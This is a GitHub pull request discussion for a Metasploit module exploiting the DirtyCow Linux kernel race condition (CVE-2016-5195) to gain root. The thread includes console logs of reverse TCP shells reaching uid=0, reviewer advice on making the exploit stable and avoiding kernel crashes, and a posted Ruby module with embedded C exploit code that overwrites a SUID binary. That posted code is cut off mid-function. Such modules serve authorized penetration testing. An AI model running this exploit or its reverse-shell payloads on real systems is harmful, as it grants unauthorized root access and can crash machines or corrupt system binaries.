CVE-2016-5195 - DirtyCow privilege escalation
rapid7/metasploit-framework pull request #7476
Opened 2016-10-22 13:03 UTC by nixawk

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/local/dirtycow`
- [ ] `set SESSION 1`
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

```
msf exploit(dirtycow) > show options

Module options (exploit/linux/local/dirtycow):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      6                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)

Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux x64

msf exploit(dirtycow) > set SESSION 7
SESSION => 7
msf exploit(dirtycow) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] Compiling /tmp/QSjHhucDLS.c via gcc
[*] Starting the payload handler...
[*] Executing at 2016-10-22 07:50:28 -0500.  May take up to 10min for callback
[*] Command shell session 8 opened (192.168.1.101:4444 -> 192.168.1.100:46051) at 2016-10-22 07:50:29 -0500

```

2016-10-22 13:29 UTC, h00die requested changes

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +      'Description' => %q{
no mention of which kernels are vulnerable

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +  def exploit
no `check` method?

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +    output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
This makes the assumption gcc is installed and in that path.  I'd put in a check to see if GCC is there or not, similar to https://github.com/rapid7/metasploit-framework/pull/7402/files#diff-97a861419258a173797265eb4a35a110R170

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +    register_file_for_cleanup(evil_path)
I think this is supposed to be `register_file_for_cleanup("#{evil_path}.c")`

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +    print_status("Executing at #{Time.now}.  May take up to 10min for callback")
Is 10min what you're seeing or was this just a copy/paste from another sploit?

2016-10-22 13:29 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +      'Author' => [ 'Nixawk' ],
no credit to the person who discovered it?

2016-10-22 13:30 UTC, h00die commented
Its optional, but I'd love to see a md for documentation :)

2016-10-22 13:32 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +      'Author' => [ 'Nixawk' ],
Phil Oester

2016-10-22 13:32 UTC, h00die commented on modules/exploits/linux/local/dirtycow.rb
> +        'DisclosureDate' => 'Oct 19 1026'
2016?

2016-10-22 13:46 UTC, nixawk commented on modules/exploits/linux/local/dirtycow.rb
> +      'Author' => [ 'Nixawk' ],
Thanks.

2016-10-22 14:00 UTC, nixawk commented on modules/exploits/linux/local/dirtycow.rb
> +      'Description' => %q{
Where is the official vulnerability information (kernel version) ?

2016-10-22 14:10 UTC, nixawk commented on modules/exploits/linux/local/dirtycow.rb
> +  def exploit
We need to know vulnerable kernel versions at first.

2016-10-22 21:18 UTC, mach-0 commented on modules/exploits/linux/local/dirtycow.rb
> +        'DisclosureDate' => 'Oct 19 2016'
You probably want this to avoid having to do setuid syscalls from a cmd shell:

    'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetuid'    => true
        },

2016-10-22 21:29 UTC, Manouchehri commented on modules/exploits/linux/local/dirtycow.rb
> +    print_status("Executing at #{Time.now}.  May take up to 10min for callback")
It takes a minute or two on my test device, up to ten minutes sounds believable.

2016-10-22 21:32 UTC, Manouchehri commented on modules/exploits/linux/local/dirtycow.rb
> +        'DisclosureDate' => 'Oct 19 1026'
CVE-2016-5195 definitely works on more than just x86/x64. I tested it on ARM and it worked fine.

2016-10-22 23:17 UTC, h00die approved these changes

2016-10-22 23:19 UTC, h00die commented
For all people testing this, please let us know what you're having success against.  @nixawk and @Manouchehri a `sysinfo` would be helpful, just so we can verify targets and not retest the sames ones.  Will also help to start building up the markdown docs for it

2016-10-22 23:27 UTC, sempervictus commented
Main issue in testing is that gcc is often not there. Has anyone taken a look at implementing via metasm?

2016-10-23 14:29 UTC, kthemis commented
I am sorry,but there is always an error : "Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION."

2016-10-23 15:59 UTC, mauri870 commented on modules/exploits/linux/local/dirtycow.rb
> +      'Name' => 'Linux Kernel DirtyCow Local Privilege Escation',
A little grammatical error, `Escation` instead of `Escalation`

2016-10-23 16:07 UTC, nixawk commented on modules/exploits/linux/local/dirtycow.rb
> +      'Name' => 'Linux Kernel DirtyCow Local Privilege Escation',
Thanks

2016-10-23 16:07 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +  Rank = GreatRanking
This should be ```ManualRanking```, since it is likely to crash the system.

2016-10-23 16:07 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +require 'msf/core'
What are all these for?

2016-10-23 16:15 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +    output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
Please add a binary-dropping method as well. It's not ideal, but neither is shelling out to GCC, and you're already writing the source to disk. Preferably, you should have the option of either.

Here's a better alternative to the above, though: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs. Look through the table of PoCs and choose a better one. There are a few that don't write to disk or crash the system.

2016-10-23 16:17 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +    register_file_for_cleanup("#{evil_path}.c")
You should restore ```/usr/bin/passwd``` from ```/tmp/bak```, then clean up ```/tmp/bak```. Ideally, you should make the SUID binary configurable.

2016-10-23 16:18 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +    print_status("Executing at #{Time.now}.")
What is this for? Does ```WfsDelay``` not work for you?

2016-10-23 16:19 UTC, nixawk commented
@wvu-r7  A new pr to fix the module ?

2016-10-23 16:21 UTC, wvu-r7 commented
@nixawk: The irony here is that I wrote my own module on Friday based on the same PoC, but I unassigned myself from the ticket because I was getting consistent crashes, and there were much better PoCs being released. I'm going to do my review here and then back out.

2016-10-23 16:22 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +    register_file_for_cleanup("#{evil_path}.c")
You should restore ```/usr/bin/passwd``` from ```/tmp/bak```, then clean up ```/tmp/bak```. Ideally, you should make the SUID binary and location of ```bak``` configurable.

2016-10-23 16:24 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +SHELLCODE
Curiously, you don't even need to do this if you have a watchdog checking for root. It's nice that the payload is within the PoC, though.

2016-10-23 16:28 UTC, nixawk commented
@wvu-r7 When a root session is gained, OS hangs when the root session is gained. The Poc code needs to be improved.

2016-10-23 16:29 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +      return CheckCode::Appears
Technically don't need these ```return``` statements.

2016-10-23 16:30 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +    output = cmd_exec("/usr/bin/gcc -pthread -o #{evil_path}.out #{evil_path}.c")
Please add a binary-dropping method as well. It's not ideal, but neither is shelling out to GCC, and you're already writing the source to disk. Preferably, you should have the option of either.

2016-10-23 16:31 UTC, wvu-r7 commented
I suggest looking through https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs and possibly choosing a better one. There are a few that don't write to disk or crash the system.

2016-10-23 16:32 UTC, wvu-r7 commented
@nixawk: I'm aware of that. That's why I dropped the ticket.

2016-10-23 16:40 UTC, nixawk commented on modules/exploits/linux/local/dirtycow.rb
> +SHELLCODE
@wvu-r7 Sorry for my poor english. What's the meaning of the word watchdog ?

2016-10-23 16:42 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +  Rank = GreatRanking
This is still unaddressed.

2016-10-23 16:42 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +  Rank = GreatRanking
This is still unaddressed: https://github.com/rapid7/metasploit-framework/pull/7476#discussion_r84598813.

2016-10-23 16:47 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +SHELLCODE
I'm slightly abusing the term here. In this case, it's a check for root and doesn't execute the payload if it times out. I've been able to get away without a loop, though, due to how ```cmd_exec``` works. YMMV.

2016-10-23 16:48 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +SHELLCODE
I'm slightly abusing the term here. In this case, it's a check for root that doesn't execute the payload if it times out. I've been able to get away without a loop, though, due to how ```cmd_exec``` works. YMMV.

2016-10-23 17:00 UTC, wvu-r7 commented
@nixawk: Thank you for the swift response. I'm grateful!

2016-10-23 17:05 UTC, nixawk commented
@wvu-r7  Wish us can make a nice module.  👍

2016-10-23 18:05 UTC, unixfox commented
@wvu-r7
List of root exploit that doesn't make any kernel crash
-----------------------------------------
- https://github.com/scumjr/dirtycow-vdso
- https://github.com/gbonacini/CVE-2016-5195
- https://github.com/dirtycow/dirtycow.github.io/pull/22/files

2016-10-23 19:06 UTC, KINGSABRI commented on modules/exploits/linux/local/dirtycow.rb
> +^
Suggestion, 
- Can we encode the source code by base64 for better appearance, then decode it before writing it to the desk? 
- Make compile(binary raw) as an option? 

thanks

2016-10-23 21:56 UTC, mach-0 commented
@sempervictus you probably need to add those symbols to the metasm exe's table, or use `dlopen`/`dlsym`, which should be in the table already.

2016-10-23 21:58 UTC, mach-0 commented on modules/exploits/linux/local/dirtycow.rb
> +  int i, c=0;
Sounds like ptrace() is the way to go for maximum combat, instead of writing `/proc/self/mem`: https://github.com/scumjr/dirtycow-vdso

2016-10-23 23:28 UTC, sempervictus commented
For maximum coverage we should have both options available - VDSO isn't always an option (RHEL 5 & friends). I'm thinking something along the lines of vector-specific stubs as methods in the module with delivery mechanisms wrapped the same way for actions such as overwriting /etc/passwd or some binary. If we can wrap it all in metasm, then we can handle padding to size, cleanup, and all that directly from the session's existing API for reading and writing files.

@mach-0: Far as adding symbols, that's generally the approach with C-in-metasm - you have to define a bunch of stuff manually for it to work. A long standing item on my wishlist is some automation for metasm to understand the prototypes of functions being called and look them up in the headers referenced within the C code or passed to its compiler as an argument (in case we want to use host-native headers to compile for that machine, or pull constants from their runtime for our C code to compile correctly).

Doing this without dropping files (other than the contents) will still require Mettle learn how to dlopenbuf (ping @bcook-r7), but this exploit is likely going to be the kitrap of Linux for years to come and we should have it as widely available as a stable privesc mechanism as we can. My bet is we still see massive attack surface on this in 12 months, with years of fun on embedded systems and such :).

2016-10-25 06:20 UTC, johncai2016 commented
I tried to put the dirtycow.rb to /root/.msf8/modules/exploits/linux/local/, but when i start the msfconsole, there is an warning and could not load the dirtycow module. The warning as following:
/root/.msf8/modules/exploits/linux/local/dirtycow.rb Msf::Modules::MetasploitClassCompatibilityError Failed to load module due to missing compatible metasploit<major_version> class constant.

Does anyone encounter this issue? How to fix it? Thanks in advanced!

2016-10-25 06:42 UTC, busterb commented
Yes, agreed @sempervictus. We'll work a bit on dlopenbuf tomorrow, though I have some alternate approaches in mind too.

@johncai2016 umm, where did .msf8 come from? Don't tell me we have another Kali linux accidental major version bump :P. At any rate, sounds like you're trying to use too old a version of metasploit with this module.

2016-10-25 06:54 UTC, johncai2016 commented
@busterb. I download the kali linux from the following url and i believe it is the latest version. I just download it several weeks ago.
https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Under /root with 'ls -a', i can see the '.msf8'.

2016-10-25 06:58 UTC, johncai2016 commented
@busterb It is a little werid, after open the msf with 'msfconsole', i see that the metasploit number is 'v4.11.8', but it did show as '.msf8' under /root.

2016-10-25 07:04 UTC, busterb commented
This is now off-topic for this PR, but your metasploit is almost a 3/4 year out of date. Make sure you're using Kali Rolling 2016.2. It should have metasploit v4.12.36, which should store files under ~/.msf4

2016-10-25 09:59 UTC, johncai2016 commented
@busterb Yes. You are right! I tried to install a separate metasploit on another ubuntu machine, and now it works. Thank you so much!

2016-10-25 11:01 UTC, johncai2016 commented
@busterb Yes. You are right! I tried to install a separate metasploit on another ubuntu machine, and now it works. Thank you so much!

2016-10-25 11:08 UTC, johncai2016 commented
@busterb In this example, how to get a session id? I tried to use the following command. But fail to get the session. It just stuck there. I have to CTRL + C to kill it.
msf exploit(dirtycow) >connect 10.89.252.90 23

PS. If I just telnet using putty, it will promts me for the username and password. (In my environment i use the metasplotable system)

2016-10-25 11:16 UTC, busterb commented
You're now off-topic for this PR @johncai2016 - for help with basic metasploit usage, see https://community.rapid7.com/ , the wiki here, http://resources.metasploit.com/ or other learning resources.

2016-10-25 11:32 UTC, johncai2016 commented
@busterb. I understand that if there is another vulnerability which user can make  use. Then user can use the meterpreter to get sessions. But in my real testing environment, i can't figure out another vulnerability in our system. But i did can telnet to our system. So i think there maybe another way i can the session. i will search more. Thanks anyway.

2016-10-25 18:54 UTC, sempervictus commented
The vdso code looks like we can metasm it at first glance.... Will need to
pull the kernels pagesize from the session tho

On Oct 23, 2016 2:06 PM, "Emilien Devos" <notifications@github.com> wrote:

> @wvu-r7 <https://github.com/wvu-r7>
> List of root exploit that doesn't make any kernel crash
>
>    - https://github.com/scumjr/dirtycow-vdso
>    - https://github.com/gbonacini/CVE-2016-5195
>    - https://github.com/dirtycow/dirtycow.github.io/pull/22/files
>
> —
> You are receiving this because you commented.
> Reply to this email directly, view it on GitHub
> <https://github.com/rapid7/metasploit-framework/pull/7476#issuecomment-255603745>,
> or mute the thread
> <https://github.com/notifications/unsubscribe-auth/ABRPjCpXdg8THNiy89avv7wgJkxMq4xMks5q26IQgaJpZM4Kd2oN>
> .
>

2016-10-26 23:27 UTC, henshin commented
Not sure if it's still relevant but folks over at https://github.com/dirtycow/dirtycow.github.io/issues/25 claim that the kernel crash can be avoided by quickly running ```echo 0 > /proc/sys/vm/dirty_writeback_centisecs``` on the privileged shell. I've tested on a kali VM with kernel 4.4.0 and it works fine but more testing should be done on other distros

2016-10-27 07:11 UTC, nixawk commented
@wvu-r7 `echo 0 > /proc/sys/vm/dirty_writeback_centisec` actually works. Is there a way to run the command automatically when the root session is created.

2016-10-27 07:12 UTC, unixfox commented
@nixawk This exploit does it : https://gist.github.com/joshuaskorich/86c90e12436c873e4a06bd64b461cc43

2016-10-27 07:14 UTC, unixfox commented
Remember that some systems doesn't allow to write on `/proc/self/mem`.

2016-10-27 20:13 UTC, fserhan commented
This sploit https://gist.github.com/joshuaskorich/86c90e12436c873e4a06bd64b461cc43 works well and stable, no freezing on: 
`Linux home 4.2.0-42-generic #49-Ubuntu SMP Tue Jun 28 21:26:26 UTC 2016 x86_64 x86_64 x86_64`
`Description: Ubuntu 15.10
Release: 15.10
Codename: wily`

You need proper casting and preventing filesystem callbacks:
`lseek(f,(__off_t)map,SEEK_SET);`
`echo '0' > /proc/sys/vm/dirty_writeback_centisecs;/bin/bash`

2016-10-27 23:13 UTC, wvu-r7 commented
That's embedded within the shellcode, though, and the module here inserts its own shellcode. You'll want to use something like ```on_new_session``` and ```shell_command_token```, @nixawk.

2016-10-27 23:17 UTC, wvu-r7 commented on modules/exploits/linux/local/dirtycow.rb
> +^
I'd prefer the source code to be in the clear, especially considering there's some string replacement going on.

2016-10-28 06:33 UTC, nixawk commented
Thanks @wvu-r7 . It works.

```
msf exploit(dirtycow) > show options

Module options (exploit/linux/local/dirtycow):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Payload options (linux/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux x64


msf exploit(dirtycow) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Compiling /tmp/qfUkGHLKox.c via gcc
[*] Executing at 2016-10-28 01:31:39 -0500.
[*] Command shell session 2 opened (192.168.1.100:4444 -> 192.168.1.106:54528) at 2016-10-28 01:31:40 -0500
id
[!] This exploit may require manual cleanup of '/tmp/qfUkGHLKox.c' on the target
[!] This exploit may require manual cleanup of '/tmp/qfUkGHLKox.out' on the target

1829423761
OmuXdMlaRoIwxyHonkBVArZEIUyAsGlv
HaGVfABgCWmdUxQVempNyOecCPkmjACj
uid=0(root) gid=1000(sec) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(sec)



```

2016-10-28 10:11 UTC, henshin commented
the code still crashes on my VM. The code inside `on_new_session(client)` function is not being called in time or with the right privileges because the writeback value doesn't seem to change on the target system.
Can someone else test this?

2016-10-28 13:22 UTC, nixawk commented
@henshin 

```
msf exploit(dirtycow) > show options

Module options (exploit/linux/local/dirtycow):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(dirtycow) > sessions -l

Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   shell linux               192.168.1.100:4444 -> 192.168.1.105:35594 (192.168.1.105)

msf exploit(dirtycow) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Compiling /tmp/KfRongCadj.c via gcc
[*] Executing at 2016-10-28 08:19:34 -0500.
[*] Command shell session 2 opened (192.168.1.100:4444 -> 192.168.1.105:35596) at 2016-10-28 08:19:36 -0500
[!] This exploit may require manual cleanup of '/tmp/KfRongCadj.c' on the target
[!] This exploit may require manual cleanup of '/tmp/KfRongCadj.out' on the target

1566004597
IagTWssmtFHEYXJlUkTdqcRmOkBrccBP
cDMAWBIBgBYmLbIAbszxhKCZVGlSlmrD
id
uid=0(root) gid=1001(asterisk) groups=1001(asterisk)
^Z
Background session 2? [y/N]  y
```

2016-10-28 15:49 UTC, henshin commented
@nixawk yes, you're right. Stability depends on the payloads.
I was using **linux/x86/meterpreter/reverse_tcp** and it crashes the kernel all the time. Non-meterpreter payloads seem to be more stable. **payload/linux/x86/shell_reverse_tcp** also worked for me.

2016-11-25 08:58 UTC, FireFart commented
@nixawk I was trying your exploit code locally and got an GCC error while compiling:
```
test.c:83: error: invalid use of undefined type ‘struct stat’
```

I fixed this by adding 
```
#include <sys/stat.h>
```
and it compiled so you might want to add this include.

2016-11-30 13:17 UTC, r8z0r commented
`msf exploit(dirtycow) > run

[*] [2016.11.30-13:15:53] Started reverse TCP handler on 192.168.1.2:4444
[*] [2016.11.30-13:15:55] Compiling /tmp/yHkxVNMFWf.c via gcc
[*] [2016.11.30-13:15:56] /tmp/yHkxVNMFWf.c: In function 'procselfmemThread':
[*] [2016.11.30-13:15:56] /tmp/yHkxVNMFWf.c:55: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast
[*] [2016.11.30-13:15:56] /usr/include/unistd.h:331: note: expected '__off_t' but argument is of type 'void *'
[*] [2016.11.30-13:15:56] Executing at 2016-11-30 13:15:56 +0000.
[-] [2016.11.30-13:16:13] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
msf exploit(dirtycow) >
`

Can someone please tell me whats going on here 

`msf exploit(dirtycow) > gcc --version
[*] exec: gcc --version

gcc (Debian/Linaro 4.4.7-2) 4.4.7
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
`
`msf exploit(dirtycow) > g++ --version
[*] exec: g++ --version

g++ (Debian/Linaro 4.4.7-2) 4.4.7
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

msf exploit(dirtycow) >
`

Could really do with your help lads thank you.

2017-01-04 03:50 UTC, nixawk commented
Thanks @FireFart. Sorry for the delay. I'll check it later.

2017-01-04 06:36 UTC, wvu-r7 commented
@nixawk: No worries. Take your time. Please entertain my outstanding comments, though. I want this one in the tree. Thank you!

2017-01-21 10:26 UTC, timwr commented on modules/exploits/linux/local/dirtycow.rb
> +  int i, c=0;
Ping @wvu @wvu-r7, apparently ptrace is more compatible on android, as some devices don't allow writing there.
If the vdso part works on all Android devices too in *theory* we could have module compatible with both linux and android :)

2017-03-03 21:30 UTC, wwebb-r7 commented
Closed due to lack of activity.  If future work on this occurs, please submit a new PR and we'll start with a clean slate.

2017-03-03 21:30 UTC, closed without merging

2018-04-11 08:59 UTC, bcoles commented
For those playing along at home, I cleaned this module up a bit (see below).

It's equally as flaky as it ever was - but now it's prettier :)

The module will not work with meterpreter payloads.

Using command shell payloads works, however the session dies shortly after.

The issues are most likely due to the way Metasploit handles executing commands on a new session with `on_new_session`.

This is also why, even though I've added `register_file_for_cleanup`, they're commented out.

Tested on Fedora 23 Server (x64) kernel 4.2.3-300.fc23.x86_64.

```
msf5 exploit(linux/local/dirtycow) > set verbose true
verbose => true
msf5 exploit(linux/local/dirtycow) > set payload
payload => linux/x86/shell_reverse_tcp
msf5 exploit(linux/local/dirtycow) > check

[!] SESSION may not be compatible with this module.
[+] Kernel version 4.2.3 appears to be vulnerable
[*]  The target appears to be vulnerable.
msf5 exploit(linux/local/dirtycow) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] Kernel version 4.2.3 appears to be vulnerable
[*] Writing '/tmp/RjPBorRTMc.c' (2423 bytes) ...
[*] Max line length is 65537
[*] Writing 2423 bytes in 1 chunks of 8745 bytes (octal-encoded), using printf
[*] Compiling /tmp/RjPBorRTMc.c via gcc
[*] Executing payload at 2018-04-11 04:37:16 -0400...
[*] Command shell session 25 opened (172.16.191.188:4444 -> 172.16.191.224:53840) at 2018-04-11 04:37:17 -0400

id

uid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023
uname -a
Linux localhost.localdomain 4.2.3-300.fc23.x86_64 #1 SMP Mon Oct 5 15:42:54 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/user
echo any time now...
any time now...
echo the session should die...
the session should die...
date
Wed Apr 11 18:37:26 AEST 2018
date
... there we go








a;slofhgvgskldfhbgfdksolg;lsdkfh
^C
Abort session 25? [y/N]  y

[*] 172.16.191.224 - Command shell session 25 closed.  Reason: User exit
msf5 exploit(linux/local/dirtycow) > P.S. the system hung
[-] Unknown command: P.S..
```

Output from another run, demonstrating session longevity (~15 seconds):

```
[*] Executing payload at 2018-04-11 04:55:47 -0400...
[*] Command shell session 4 opened (172.16.191.188:4444 -> 172.16.191.224:49510) at 2018-04-11 04:55:49 -0400
id
date

uid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023
Wed Apr 11 18:55:40 AEST 2018
date
Wed Apr 11 18:55:53 AEST 2018
date
Wed Apr 11 18:55:54 AEST 2018
date
Wed Apr 11 18:55:54 AEST 2018
date
Wed Apr 11 18:55:55 AEST 2018
date
Wed Apr 11 18:55:56 AEST 2018
date
Wed Apr 11 18:55:57 AEST 2018
date
date
date
date
^C
Abort session 4? [y/N]  y

[*] 172.16.191.224 - Command shell session 4 closed.  Reason: User exit
```

I lost interest and won't be making any additional progress.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linux Kernel DirtyCow Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a race condition in the way the Linux kernel's
        memory subsystem handled the copy-on-write (COW) breakage of private
        read-only memory mappings. An unprivileged local user could use
        this flaw to gain write access to otherwise read-only memory mappings
        and thus increase their privileges on the system.

        The bug has existed since around Linux Kernel 2.6.22 (released in 2007).

        Note, failed exploitation attempts will likely crash the kernel.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Phil Oester',  # Vulnerability Discovery
        'Robin Verton', # cowroot.c developer
        'Nixawk'        # original module developer
      ],
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'References'     =>
        [
          ['CVE', '2016-5195'],
          ['URL', 'https://dirtycow.ninja/'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/issues/25'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails'],
          ['URL', 'https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs'],
          ['URL', 'https://access.redhat.com/security/cve/cve-2016-5195'],
          ['URL', 'https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619']
        ],
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 }],
          [ 'Linux x64', { 'Arch' => ARCH_X64 }]
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD'          => 'linux/x86/shell_reverse_tcp',
          'PrependSetresuid' => true,
          'PrependSetuid'    => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 19 2016'))

    register_options([
      OptString.new('WritableDir', [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
      OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/usr/bin/passwd' ])
    ])
  end

  def base_dir
    datastore['WritableDir']
  end

  def suid_exe_path
    datastore['SUID_EXECUTABLE']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    #register_file_for_cleanup path
  end

  def check
    version = Gem::Version.new kernel_release.split('-').first

    if version.to_s.eql? ''
      vprint_error 'Could not determine the kernel version'
      return CheckCode::Unknown
    end

    unless version >= Gem::Version.new('2.6.22')
      vprint_error "Kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end

    # This could use some improvement for 4.x kernel release parsing...
    if (version <= Gem::Version.new('4.4.26')) ||
       (version.to_s.start_with?('4.7.') && version < Gem::Version.new('4.7.9')) ||
       (version.to_s.start_with?('4.8.') && version < Gem::Version.new('4.8.3'))
      vprint_good "Kernel version #{version} appears to be vulnerable"
      return CheckCode::Appears
    end

    vprint_error "Kernel version #{version} may or may not be vulnerable"
    CheckCode::Unknown
  end

  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\""
    elsif session.type.to_s.eql? 'shell'
      client.shell_command_token 'echo 0 > /proc/sys/vm/dirty_writeback_centisecs'
    end
  end

  def exploit
    if check == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    main = %q^
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>

void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1, pth2, pth3;

char suid_binary[] = "SUID_EXECUTABLE";

SHELLCODE

unsigned int shellcode_size = 0;


void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i, c=0;
  for(i=0; i<1000000 && !stop; i++) {
    c += madvise(map,100,MADV_DONTNEED);
  }
  printf("thread stoppe [...]

2018-12-21 18:01 UTC, bcoles commented
> I lost interest and won't be making any additional progress.

I'm back for another round.

The below exploit is reliable (at least on the single system I bothered to test), and supports both command shell sessions and meterpreter sessions, and both command shell payloads and meterpreter payloads, **with two huge caveats**:

* It won't run if SELinux is Enforcing.
  * If you wanted to bypass this check, you could get `root` for about ~15 seconds before the kernel dies a firey death. SELinux prevents setting `/proc/sys/vm/dirty_writeback_centisecs` to `0`, which is required to prevent aforementioned firey death.
* It **overwrites** the specified `SUID_EXECUTABLE` (default: `/usr/bin/passwd`) __without repair__.
  * A backup is created (default: `/tmp/.<rand>`), but cannot be restored from within the exploit, as the specified `SUID_EXECUTABLE` is held open: `Text file busy`

This is a restriction with using the SUID executable technique; although could probably be worked around. Presumably, overwriting the specified `SUID_EXECUTABLE` with a root shell (rather than directly replacing it with a meterpreter/shell payload), then using the root shell to do the following, would be successful:

* set `/proc/sys/vm/dirty_writeback_centisecs` to `0`; then
* `chmod u+s /path/to/msf/payload`; then
* kill the root shell process; then
* invoke our shiny new setuid root payload; then
* restore the `SUID_EXECUTABLE` backup file in `on_new_session`

Enjoy:

---

```
msf5 exploit(linux/local/dirtycow_priv_esc) > set payload
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/dirtycow_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[+] SELinux is permissive
[+] Kernel version 4.2.3 appears to be vulnerable
